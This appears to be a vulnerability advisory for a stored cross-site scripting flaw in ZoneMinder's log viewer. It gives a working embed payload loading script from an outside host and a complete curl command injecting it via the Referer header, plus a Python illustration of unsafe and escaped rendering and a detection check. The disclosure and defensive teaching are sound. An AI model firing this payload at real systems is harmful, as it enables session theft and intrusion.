Impact
Log entries containing a malicious referrer field can be injected into the database logs. That field is not escaped when the logs are viewed in the web UI, so markup in it is rendered as live HTML.
The payload is then: <embed type="text/html" src="http://hive.daho.at/xsstest.html" width="10" height="10">
hive.daho.at is my server; the file should still be there, and its content is simple: <script>alert('Hello from the XSS');</script>
In a complete curl statement: curl 'http:///zm/cgi-bin/nph-zms?user=admin&token=asdfa' -H 'Referer: %3Cembed%20type=%22text/html%22%20src=%22http://hive.daho.at/xsstest.html%22%20width=%2210%22%20height=%2210%22%3E'
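To illustrate the bug class and its fix, here is an added Python example (not ZoneMinder's code) that decodes the Referer value from the curl command above, shows the unescaped versus HTML-escaped rendering of a log row, and includes a simple check for flagging referrer values that carry markup during log review. The row layout and function names are assumptions for illustration only.

```python
import html
from urllib.parse import unquote

# Constructed sample: the percent-encoded Referer value from the curl
# command above, as it arrives in the request header.
RAW_REFERER = ('%3Cembed%20type=%22text/html%22%20src=%22http://hive.daho.at/'
               'xsstest.html%22%20width=%2210%22%20height=%2210%22%3E')


def decode_referer(header_value: str) -> str:
    """Return the Referer header as the server sees it after URL-decoding."""
    return unquote(header_value)


def render_log_row_unsafe(referrer: str) -> str:
    """Vulnerable pattern (illustrative, not ZoneMinder's code): the stored
    field is written into the page verbatim, so any tag in it becomes HTML."""
    return f"<td>{referrer}</td>"


def render_log_row_safe(referrer: str) -> str:
    """Fixed pattern: HTML-escape the stored field at output time, so the
    browser shows the tag as text instead of loading it."""
    return f"<td>{html.escape(referrer, quote=True)}</td>"


def contains_markup(referrer: str) -> bool:
    """Review helper: flag referrer values containing raw angle brackets,
    which a legitimate URL never needs (they would be percent-encoded)."""
    return "<" in referrer or ">" in referrer


if __name__ == "__main__":
    ref = decode_referer(RAW_REFERER)
    print("decoded:", ref)
    print("unsafe: ", render_log_row_unsafe(ref))
    print("safe:   ", render_log_row_safe(ref))
    print("flagged:", contains_markup(ref))
```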
Patches
Fixed by 4637eaf, then 57bf25d and e1028c1
Workarounds
Patch manually.
Credit
Daniel Hofer